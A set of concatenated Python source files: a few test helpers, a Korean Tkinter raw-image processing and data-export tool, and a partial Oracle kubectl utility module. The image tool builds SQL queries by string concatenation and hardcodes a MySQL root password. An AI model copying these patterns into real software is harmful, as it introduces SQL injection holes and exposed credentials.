return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
|
tk_raw_image_analy_ver1.0(bera1).py
|
## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # 영상이 128미만이면
VIEW_X = outW
VIEW_Y = outH
step = 1 # 건너뛸숫자
else :
step = int(outW / VIEW_X)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH,step) :
for k in range(0, outW,step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def a_histogram() : # 히스토 그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256; normalList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
# 정규화된값 = (카운트값 - 최소값) * High / (최대값 - 최소값)
maxVal = max (countList); minVal = min(countList)
for i in range(len(countList)) :
normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
# 화면 출력
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width=256, height=256)
subPaper = PhotoImage(width=256, height=256)
subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
for i in range(0, 256) :
for k in range(0, int(normalList[i])) :
data = 0
subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
subCanvas.pack(expand=1, anchor=CENTER)
subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() : # 히스토 그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # 약 0.34 쯤
for r in range(outH):
ws.set_row(r, 9.5) # 약 0.35 쯤
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# data 값으로 셀의 배경색을 조절 #000000~#FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# 셀의 포맷을 준비
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histoStretch() : # 히스토그램 스트래칭 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_endInSearch() : # 엔드-인 탐색 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
maxVal -= limit
minVal += limit
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_histoEqual() : # 히스토그램 평활화 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
histo = [0] * 255; sumHisto = [0] * 255; normalHisto=[0] * 255
HIGH = 255
# 히스토그램 작성
for i in range(inH) :
for k in range(inW) :
value = inImage[i][k]
histo[value] += 1
# 누적 히스토그램 작성
sVal = 0
for i in range(len(histo)) :
sVal += histo[i]
sumHisto[i] = sVal
# 정규화된 누적 히스토그램 : (누적합 / (행개수*열개수)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
# 정규화된 값으로 출력하기
for i in range(inH) :
for k in range(inW) :
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
def embossing() : # 화소영역 - 엠보싱 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
MSIZE=3
mask = [ [-1, 0, 0], [0, 0, 0], [0, 0, 1] ]
# 임시 입력 영상 = inImage보다 2열이 큰...
tmpInImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(outH):
tmpList = []
for k in range(outW):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 원래입력 --> 임시입력
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
# 회선연산하기. 마스크로 쭉 긁으면서 계산하기...
for i in range(1, inH):
for k in range(1, inW):
# 1점을 처리하되, 3x3 반복해서 처리: 마스크 연산 : 모두 곱해서더하기
S = 0.0
for m in range(0,MSIZE) :
for n in range(0,MSIZE) :
S += mask[m][n]*tmpInImage[i+(m-1)][k+(n-1)]
tmpOutImage[i-1][k-1] = S
# 127 더해주기 (마스크의 합계가 0인 경우)
for i in range(outW):
for k in range(outH):
tmpOutImage[i][k] += 127
# 임시 출력 --> 원래출력
for i in range(outW) :
for k in range(outH) :
value = int(tmpOutImage[i][k])
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage[i][k] = value
display()
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## 메인 코드부
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 1.0 (Beta 1)')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
|
kutil.py
|
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
#
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
#
# Kubernetes (kubectl) utilities
# Use kubectl instead of the API so we go through the same code path as an end-user
import os
import subprocess
import logging
import threading
import time
import re
import yaml
import base64
import pathlib
logger = logging.getLogger("kutil")
debug_kubectl = False
ALL_RSRC_TYPES = ["ic", "mbk", "po", "sts", "rs", "deploy",
"svc", "cm", "secret", "jobs", "deploy", "pvc", "sa"]
def b64decode(s):
return base64.b64decode(s).decode("utf8")
def b64encode(s):
return base64.b64encode(bytes(s, "utf8")).decode("ascii")
def strip_blanks(s):
"""
Strip empty lines in the string.
"""
return "\n".join([l for l in s.split("\n") if l.strip()])
class TableSplitter:
def __init__(self, header):
columns = []
while header:
end = header.find(" ")
if end < 0:
columns.append(header)
header = ""
else:
while end < len(header) and header[end] == " ":
end += 1
columns.append(header[:end])
header = header[end:]
self.widths = [len(c) for c in columns]
self.columns = [c.strip() for c in columns]
# TODO handle changing column widths
def split(self, line):
fields = []
offs = 0
for i, p in enumerate(self.widths[:-1]):
op = p
# adjust widths in case some colunm grew
while p <= len(line) and line[p-1] != " ":
p += 1
offs += 1
if p > op:
while p < len(line) and line[p] == " ":
p += 1
offs += 1
self.widths[i] = p
fields.append(line[:p].strip())
line = line[p:]
fields.append(line.strip())
return fields
def split_dict(self, line):
return dict(zip(self.columns, self.split(line)))
def split_table(s):
lines = s.rstrip().split("\n")
splitter = TableSplitter(lines[0])
return [dict(zip(splitter.columns, splitter.split(l))) for l in lines[1:]]
def kubectl(cmd, rsrc=None, args=None, timeout=None, check=True, ignore=[]):
argv = ["kubectl", cmd]
if rsrc:
argv.append(rsrc)
if args:
argv += args
if debug_kubectl:
logger.debug("run %s", " ".join(argv))
try:
r = subprocess.run(argv, timeout=timeout,
check=check, capture_output=True)
except subprocess.CalledProcessError as e:
for ig in ignore:
if "(%s)" % ig in e.stderr.decode("utf8"):
if debug_kubectl:
logger.debug("rc = %s, stderr=%s",
e.returncode, e.stderr.decode("utf8"))
return
else:
logger.error("kubectl %s failed:\n stderr=%s\n stdout=%s",
e.cmd, e.stderr.decode("utf8"), e.stdout.decode("utf8"))
raise
if debug_kubectl:
logger.debug("rc = %s, stdout = %s", r.returncode,
r.stdout.decode("utf8"))
return r
def kubectl_popen(cmd, args=[]):
argv = ["kubectl", cmd] + args
if debug_kubectl:
logger.debug("popen %s", " ".join(argv))
return subprocess.Popen(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def watch(ns, rsrc, name, fn, timeout, format=None):
argv = ["kubectl", "get", rsrc, "-n", ns, "--watch", "-o%s" % format]
if name:
argv.append(name)
found = None
def kill_on_timeout(p):
start_time = time.time()
while time.time() - start_time < timeout and p.poll() is None:
time.sleep(1)
if p.poll() is None and not found:
logger.info(f"Timeout waiting for condition on {rsrc}")
p.terminate()
if debug_kubectl:
logger.debug("run %s", argv)
p = subprocess.Popen(argv, stdout=subprocess.PIPE)
thd = threading.Thread(target=kill_on_timeout, args=(p,))
thd.start()
header = p.stdout.readline().decode("utf8")
splitter = TableSplitter(header)
output = [header]
while p.poll() is None:
line = p.stdout.readline().decode("utf8")
output.append(line)
if fn(splitter.split_dict(line)):
if debug_kubectl:
logger.debug(
f"watch condition on {rsrc} succeeded with {line}")
p.terminate()
found = line
break
thd.join()
output = "".join(output)
if not found:
logger.error(
f"Timeout waiting for condition in {rsrc} {ns}/{name}. output={output}")
if debug_kubectl:
logger.debug("rc = %s, stdout = %s", p.returncode, output)
return found
def feed_kubectl(input, cmd, rsrc=None, args=None, check=True):
argv = ["kubectl", cmd]
if rsrc:
argv.append(rsrc)
if args:
argv += args
if debug_kubectl:
logger.debug("run %s", argv)
r = subprocess.run(argv, input=input.encode("utf8"),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
check=check)
print(r.stdout.decode("utf8"))
if debug_kubectl:
logger.debug("rc = %s", r)
return r
#
def __ls(ns, rsrc):
return split_table(kubectl("get", rsrc, args=["-n", ns]).stdout.decode("utf8"))
def ls_ic(ns):
return __ls(ns, "ic")
def ls_mbk(ns):
return __ls(ns, "mbk")
def ls_sts(ns):
return __ls(ns, "sts")
def ls_rs(ns):
return __ls(ns, "rs")
def ls_deploy(ns):
return __ls(ns, "deploy")
def ls_svc(ns):
return __ls(ns, "svc")
def ls_po(ns, *, pattern=".*"):
pods = __ls(ns, "po")
r = re.compile(pattern)
return [pod for pod in pods if r.match(pod["NAME"])]
def ls_pvc(ns):
return __ls(ns, "pvc")
def ls_pv(ns):
return __ls(ns, "pv")
def ls_all_raw(ns):
output = []
for t in ALL_RSRC_TYPES:
r = kubectl("get", t, args=["-n", ns]).stdout.decode("utf8")
if r and t == "secret":
# strip automatically added default token
lines = [l for l in r.strip().split(
"\n") if not l.startswith("default-token-")]
if len(lines) <= 1:
r = ""
else:
r = "\n".join(lines)
if r:
output.append("### " + t)
output.append(r)
return "\n".join(output)
def ls_ns():
return split_table(kubectl("get", "namespace").stdout.decode("utf8"))
#
def get(ns, rsrc, name):
r = kubectl("get", rsrc, args=[name, "-n", ns, "-o=yaml"])
if r.stdout:
return yaml.safe_load(r.stdout.decode("utf8"))
return None
def get_ic(ns, name, jpath=None):
return get(ns, "ic", name)
def get_mbk(ns, name, jpath=None):
return get(ns, "mbk", name)
def get_sts(ns, name, jpath=None):
return get(ns, "sts", name)
def get_rs(ns, name, jpath=None):
return get(ns, "rs", name)
def get_deploy(ns, name, jpath=None):
return get(ns, "deploy", name)
def get_svc(ns, name, jpath=None):
return get(ns, "svc", name)
def get_po(ns, name, jpath=None):
return get(ns, "po", name)
def get_ev(ns, selector, *, after=None, fields=None):
def lookup(obj, field):
r = {}
f, dot, rest = field.partition(".")
if rest:
assert isinstance(obj[f], dict), field
r[f] = lookup(obj[f], rest)
else:
assert f in obj, f"key={f} dict={obj}"
r[f] = obj[f]
return r
r = kubectl("get", "ev", args=[
"--field-selector="+selector,
"--sort-by=.metadata.creationTimestamp",
"-n", ns, "-o=yaml"])
if r.stdout:
evs = yaml.safe_load(r.stdout.decode("utf8"))["items"]
if after or fields:
res = []
for ev in evs:
if (not after or
ev["metadata"]["creationTimestamp"] >= after):
nev = {}
if fields:
for f in fields:
nev.update(lookup(ev, f))
else:
nev = ev
res.append(nev)
evs = res
return evs
return None
def get_ic_ev(ns, icname, *, after=None, fields=None):
return get_ev(ns, f"involvedObject.kind=InnoDBCluster,involvedObject.name={icname}", after=after, fields=fields)
def get_po_ev(ns, name, *, after=None, fields=None):
return get_ev(ns, f"involvedObject.kind=Pod,involvedObject.name={name}", after=after, fields=fields)
#
def describe_po(ns, name, jpath=None):
r = kubectl("describe", "po", [name, "-n", ns])
if r.stdout:
return r.stdout.decode("utf8")
raise Exception(f"Error for describe {ns}/{name}")
def describe_ic(ns, name):
r = kubectl("describe", "ic", [name, "-n", ns])
if r.stdout:
return r.stdout.decode("utf8")
raise Exception(f"Error for describe {ns}/{name}")
#
def delete(ns, rsrc, name, timeout):
if not name:
name = "--all"
kubectl("delete", rsrc, [name] + (["-n", ns]
if ns else []), timeout=timeout, ignore=["NotFound"])
def delete_ic(ns, name, timeout=200):
